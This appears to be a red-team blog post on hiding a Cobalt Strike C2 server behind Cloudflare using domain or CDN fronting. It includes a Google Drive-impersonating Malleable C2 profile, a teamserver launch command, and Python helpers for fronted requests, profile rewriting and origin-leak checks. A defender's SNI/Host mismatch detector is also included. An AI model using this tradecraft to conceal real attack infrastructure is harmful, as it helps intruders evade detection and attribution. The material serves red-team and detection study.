title: C2 Hiding - Domain Fronting
tags: anonymity
categories:


C2 Hiding: Domain Fronting (to be continued)

Preface

During a red team engagement, a C2 server that has not been protected in some way is easy to trace: every command-and-control session creates network connections from the victim machine directly to the C2 server, so its real IP is quickly traced, the server is burned, and further operations become difficult.

Domain fronting

Domain fronting (sometimes translated into Chinese as 域名幌子) is a censorship-circumvention technique that hides the true endpoint of a connection. It works at the application layer: a client reaches a blocked service over HTTPS while, from the outside, it appears to be talking to a completely different site.

The technique exists to conceal the remote endpoint of a communication and is used over HTTPS. The remote endpoint is one a filter would block; with domain fronting, the filter is led to believe the traffic is headed to some other, legitimate address and lets it through. The core idea is to use different domain names at different layers of the same HTTPS request. The outer layer, the DNS query and the TLS SNI (Server Name Indication), carries one domain; the inner layer, the HTTP Host header, carries another. Because the Host header travels inside the TLS session, it is invisible to anything that only inspects the outer layer. The edge that terminates TLS (a CDN, for example) reads the Host header and routes the request on to the real destination.
The diagram below is borrowed from another author.
C2 Hiding - Domain Fronting - Figure 1
Any high-reputation domain can in principle serve as the front, Google or Microsoft for example; this post only walks through a simple practice run. Two caveats are worth stating up front. Since 2018 the largest providers (Google and Amazon CloudFront among them) no longer serve requests whose HTTP Host does not match the domain the TLS connection was negotiated for, so fronting behind someone else's domain mostly no longer works. And the setup below does not attempt that anyway: step 7 sets the Host header to the C2 domain itself, so what is actually achieved is hiding the C2 origin behind Cloudflare's edge addresses for the author's own domain, which is better described as CDN or reverse-proxy fronting. The origin is hidden from the victim and from casual lookup, but not from Cloudflare.
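The split between the outer and inner names described above, in code. This is an added example and not part of the original post; host names, the proxy log and the IP addresses are constructed. The client half does what a fronting client does (resolve and SNI the front, put the real endpoint in Host) and only works against an edge that still routes on Host; the defender half shows the one vantage point from which the trick is visible, a TLS-terminating proxy that logs both the ClientHello SNI and the decrypted Host header.

```python
"""Domain fronting on the wire, client side and defender side.

Added example (not from the original post).  All host names, the log lines
and the addresses are constructed placeholders.
"""
import socket
import ssl


def build_fronted_request(front_domain: str, inner_host: str, path: str = "/") -> bytes:
    """Plaintext HTTP/1.1 request that travels inside the TLS tunnel.

    The front domain never appears here; only inner_host does, and this whole
    buffer is ciphertext to anyone who cannot terminate the TLS session.
    """
    if front_domain.lower() == inner_host.lower():
        raise ValueError("outer and inner names are equal: this is not fronting")
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {inner_host}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()


def send_fronted(front_domain: str, inner_host: str, path: str = "/", timeout: float = 10) -> bytes:
    """Resolve and SNI the front domain, then speak HTTP to inner_host inside TLS.

    Needs the network, and only succeeds if the edge owning front_domain
    routes on the Host header (the big CDNs stopped doing so for foreign
    Hosts in 2018).
    """
    request = build_fronted_request(front_domain, inner_host, path)
    ctx = ssl.create_default_context()
    with socket.create_connection((front_domain, 443), timeout=timeout) as raw:
        # server_hostname is the SNI in the ClientHello and the name the edge
        # certificate is validated against: both see the front, never inner_host.
        with ctx.wrap_socket(raw, server_hostname=front_domain) as tls:
            tls.sendall(request)
            chunks = []
            while True:
                data = tls.recv(4096)
                if not data:
                    break
                chunks.append(data)
    return b"".join(chunks)


# Constructed proxy log: one line per TLS session, as a TLS-inspecting proxy
# that records both the ClientHello SNI and the decrypted Host would write it.
SAMPLE_PROXY_LOG = """\
2021-03-01T10:00:00Z src=10.0.0.5 sni=cdn.example.com host=cdn.example.com
2021-03-01T10:00:01Z src=10.0.0.5 sni=cdn.example.com host=c2.example.net:443
2021-03-01T10:00:02Z src=10.0.0.7 sni=mail.example.org host=MAIL.example.org
2021-03-01T10:00:03Z src=10.0.0.9 sni=cdn.example.com host=drive.example.com
"""


def _strip_port(host: str) -> str:
    """'c2.example.net:443' -> 'c2.example.net'; handles bracketed IPv6 literals."""
    if host.startswith("["):
        return host.split("]")[0][1:]
    return host.split(":", 1)[0]


def find_sni_host_mismatches(log_text: str) -> list:
    """Return (src, sni, host) for sessions whose SNI and Host name disagree.

    Case and port differences are normalised first, so only genuine
    outer/inner name splits are reported.
    """
    hits = []
    for line in log_text.splitlines():
        fields = dict(kv.split("=", 1) for kv in line.split()[1:] if "=" in kv)
        sni = fields.get("sni", "").lower()
        host = _strip_port(fields.get("host", "")).lower()
        if sni and host and sni != host:
            hits.append((fields.get("src"), sni, host))
    return hits
```

Without TLS interception, a network sensor sees only the DNS name and the SNI, which is exactly why the outer name is chosen to look benign; the mismatch check above is therefore only possible where TLS is terminated, which for the setup in this post is Cloudflare's edge, not the victim's network.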

Preparation

  1. A C2 domain
  2. A Cloudflare account
  3. A C2 server

    Domain configuration

  4. Buy a domain on GoDaddy and set its NS records to Cloudflare's nameservers so that Cloudflare serves the zone.
    C2 Hiding - Domain Fronting - Figure 2

  5. Add the corresponding A record in Cloudflare, with Cloudflare's proxy enabled for it; an unproxied record simply publishes the origin IP.
    C2 Hiding - Domain Fronting - Figure 3
  6. Adjust Cloudflare's cache settings
    Turn off Development Mode and caching, so that Beacon traffic is never answered from cache instead of reaching the team server.
    C2 Hiding - Domain Fronting - Figure 4
  7. Configure C2.profile
    rsmudge's repository https://github.com/rsmudge/Malleable-C2-Profiles collects ready-made Malleable C2 profiles; the Google Drive profile from it (by @bluscreenofjeff) is used here as the reference:

```
#
# Google Drive
#
# Author: @bluscreenofjeff
#

#set https cert info
https-certificate {
    set CN "*.google.com"; #Common Name
    set O "Google Inc"; #Organization Name
    set C "US"; #Country
    set L "Mountain View"; #Locality
    set ST "California"; #State or Province
    set validity "365"; #Number of days the cert is valid for
}

#default Beacon sleep duration and jitter
set sleeptime "60000";
set jitter "20";

#default useragent for HTTP comms
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";

#IP address used to indicate no tasks are available to DNS Beacon
set dns_idle "8.8.4.4";
#Force a sleep prior to each individual DNS request. (in milliseconds)
set dns_sleep "0";
#Maximum length of hostname when uploading data over DNS (0-255)
set maxdns "235";

http-get {
    set uri "/viewerng/meta";

    client {
        header "Accept" "text/html,application/xml;*/*;";
        header "Accept-Encoding" "gzip, deflate";
        header "Host" "drive.google.com";
        header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";

        #session metadata
        metadata {
            base64url;
            netbios;
            base64url;
            parameter "id";
        }

        parameter "u" "0";
    }

    server {
        header "Content-Type" "application/json; charset=utf-8";
        header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
        header "Pragma" "no-cache";
        header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
        header "X-Content-Type-Options" "nosniff";
        header "X-Frame-Options" "SAMEORIGIN";
        header "X-XSS-Protection" "1; mode=block";
        header "Server" "GSE";
        header "Connection" "close";

        #Beacon's tasks
        output {
            print;
        }
    }
}

http-post {
    set uri "/viewersng/meta";
    set verb "GET";

    client {
        header "Accept" "text/html,application/xml;*/*;";
        header "Accept-Encoding" "gzip, deflate";
        header "Host" "drive.google.com";
        header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";

        output {
            base64url;
            netbios;
            base64url;
            parameter "id";
        }

        #session ID
        id {
            parameter "u";
        }
    }

    server {
        header "Content-Type" "application/json; charset=utf-8";
        header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
        header "Pragma" "no-cache";
        header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
        header "X-Content-Type-Options" "nosniff";
        header "X-Frame-Options" "SAMEORIGIN";
        header "X-XSS-Protection" "1; mode=block";
        header "Server" "GSE";
        header "Connection" "close";

        output {
            print;
        }
    }
}

#change the stager server
http-stager {
    server {
        header "Content-Type" "application/json; charset=utf-8";
        header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
        header "Pragma" "no-cache";
    }
}
```

Note that every domain in the profile must be replaced with the C2 domain: the Host headers in both the http-get and http-post client blocks, and the CN in https-certificate. A Host header still pointing at drive.google.com is not routed by Cloudflare to the origin.
C2 Hiding - Domain Fronting - Figure 5
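A small check for the replacement step above, as an added example; it is not part of the post and not a Cobalt Strike tool. It lists every host name a profile still carries in Host headers and in the certificate CN, reports those that do not point at the C2 domain, rewrites them, and verifies that the http-get and http-post URIs differ (the server needs distinct URIs to tell the two request types apart; the template keeps them distinct for that reason). The sample profile is a constructed excerpt of the Google Drive template; c2.example.net is a placeholder. Note that with Cloudflare proxying, the https-certificate block is only presented to Cloudflare on the edge-to-origin leg; the victim sees Cloudflare's own edge certificate, so the CN is rewritten for consistency rather than for what the victim observes.

```python
"""Malleable C2 profile domain hygiene check (added example, not from the post).

Finds Host headers and the certificate CN, flags names that do not match the
C2 domain, rewrites them, and checks http-get/http-post URIs are distinct.
"""
import re

# Constructed excerpt of the Google Drive template referenced in the post.
SAMPLE_PROFILE = '''\
https-certificate {
    set CN "*.google.com";
    set O "Google Inc";
}
http-get {
    set uri "/viewerng/meta";
    client {
        header "Host" "drive.google.com";
    }
}
http-post {
    set uri "/viewersng/meta";
    set verb "GET";
    client {
        header "Host" "drive.google.com";
    }
}
'''

HOST_HEADER = re.compile(r'(header\s+"Host"\s+")([^"]+)(")', re.IGNORECASE)
CERT_CN = re.compile(r'(set\s+CN\s+")([^"]+)(")')
# Matches `http-get {` / `http-post {` (optionally with a variant name) up to
# the block's own `set uri`, which in profiles sits before any nested block.
BLOCK_URI = re.compile(r'(http-get|http-post)(?:\s+"[^"]*")?\s*\{[^{}]*?set\s+uri\s+"([^"]+)"')


def name_covers(pattern: str, domain: str) -> bool:
    """True if a name such as '*.example.net' or 'c2.example.net' covers domain."""
    pattern, domain = pattern.lower(), domain.lower()
    if pattern.startswith("*."):
        parent = pattern[2:]
        # a wildcard covers exactly one extra label
        return domain.endswith("." + parent) and domain.count(".") == parent.count(".") + 1
    return pattern == domain


def profile_names(profile: str) -> list:
    """Every host name in the certificate CN and the Host headers, in document order."""
    names = [m.group(2) for m in CERT_CN.finditer(profile)]
    names += [m.group(2) for m in HOST_HEADER.finditer(profile)]
    return names


def leftover_domains(profile: str, c2_domain: str) -> list:
    """Sorted, de-duplicated names that would not point at the C2 domain."""
    return sorted({n for n in profile_names(profile) if not name_covers(n, c2_domain)})


def rewrite_domains(profile: str, c2_domain: str) -> str:
    """Point every Host header and the certificate CN at c2_domain."""
    profile = HOST_HEADER.sub(lambda m: m.group(1) + c2_domain + m.group(3), profile)
    return CERT_CN.sub(lambda m: m.group(1) + c2_domain + m.group(3), profile)


def uris_distinct(profile: str) -> bool:
    """http-get and http-post must not share a URI (a `set uri` may list several)."""
    uris = {}
    for block, uri in BLOCK_URI.findall(profile):
        uris.setdefault(block, set()).update(uri.split())
    return not (uris.get("http-get", set()) & uris.get("http-post", set()))


if __name__ == "__main__":
    c2 = "c2.example.net"  # placeholder C2 domain
    print("leftover:", leftover_domains(SAMPLE_PROFILE, c2))
    fixed = rewrite_domains(SAMPLE_PROFILE, c2)
    print("after rewrite:", leftover_domains(fixed, c2), "uris distinct:", uris_distinct(fixed))
```

Run it against the real profile file (read it into a string in place of SAMPLE_PROFILE) before starting the team server; Cobalt Strike's own c2lint still has to be run separately, since this script only checks names and URIs.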

C2 configuration

  1. Upload the modified C2.profile to the Cobalt Strike root directory and append ./C2.profile to the teamserver start command, e.g.:

     ./teamserver C2ip Password ./C2.profile

  2. Create the listener in Cobalt Strike. The host Beacon calls back to must be the C2 domain, not the server's IP; otherwise Beacon connects straight to the origin and bypasses Cloudflare.
    C2 Hiding - Domain Fronting - Figure 6

    Final result

    C2 Hiding - Domain Fronting - Figure 7
    C2 Hiding - Domain Fronting - Figure 8
    Hidden successfully.
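A check for the result the screenshots above are meant to show, as an added example that is not part of the post. It verifies the two observable properties of the setup: the domain's public A records are all Cloudflare edge addresses (the origin IP is not published), and responses come back through Cloudflare's proxy (Server: cloudflare plus a CF-RAY header). The DNS answers and response headers are constructed stand-ins for `dig +short` and `curl -sI` output; the Cloudflare ranges are a two-entry placeholder snapshot, and the live list must be fetched from https://www.cloudflare.com/ips-v4 before relying on this.

```python
"""Post-deployment exposure check for a CDN-fronted C2 domain.

Added example (not from the post).  Inputs are constructed; CLOUDFLARE_NETS is
a placeholder snapshot of two published ranges, not the full list.
"""
import ipaddress
import socket

# Placeholder subset of Cloudflare's published IPv4 ranges (fetch the live list).
CLOUDFLARE_NETS = [ipaddress.ip_network(n) for n in ("104.16.0.0/13", "172.64.0.0/13")]

# Constructed inputs standing in for `dig +short c2.example.net` and `curl -sI`.
SAMPLE_ANSWERS = ["104.21.5.6", "172.67.8.9"]
SAMPLE_LEAKED_ANSWERS = ["104.21.5.6", "203.0.113.10"]   # origin IP accidentally published
SAMPLE_HEADERS = "HTTP/1.1 200 OK\r\nServer: cloudflare\r\nCF-RAY: 0123456789abcdef-SJC\r\n\r\n"
SAMPLE_DIRECT_HEADERS = "HTTP/1.1 200 OK\r\nServer: GSE\r\nConnection: close\r\n\r\n"


def is_edge_address(ip: str, nets=CLOUDFLARE_NETS) -> bool:
    """True if ip falls inside one of the CDN edge ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def unproxied_answers(answers, nets=CLOUDFLARE_NETS) -> list:
    """Addresses in the DNS answer that are not edges: each one is the origin leaking."""
    return [a for a in answers if not is_edge_address(a, nets)]


def served_via_cloudflare(raw_headers: str) -> bool:
    """True if the response carries Cloudflare's Server header and a CF-RAY id."""
    headers = {}
    for line in raw_headers.split("\r\n")[1:]:   # skip the status line
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return headers.get("server", "").lower() == "cloudflare" and "cf-ray" in headers


def exposure_report(answers, raw_headers, nets=CLOUDFLARE_NETS) -> dict:
    """Combine both checks: hidden only if no origin leaks and traffic is proxied."""
    leaks = unproxied_answers(answers, nets)
    proxied = served_via_cloudflare(raw_headers)
    return {
        "origin_leaked": bool(leaks),
        "leaked_addresses": leaks,
        "proxied": proxied,
        "hidden": not leaks and proxied,
    }


def live_answers(domain: str) -> list:
    """Resolve the domain for real (needs the network; not used by the samples)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(domain, 443, socket.AF_INET)})


if __name__ == "__main__":
    print(exposure_report(SAMPLE_ANSWERS, SAMPLE_HEADERS))
    print(exposure_report(SAMPLE_LEAKED_ANSWERS, SAMPLE_DIRECT_HEADERS))
```

Passing this check does not mean the origin cannot be found: DNS history from before the record was proxied, a certificate transparency entry, or the origin answering on its bare IP all still give it away, so the origin should additionally only accept connections from Cloudflare's ranges.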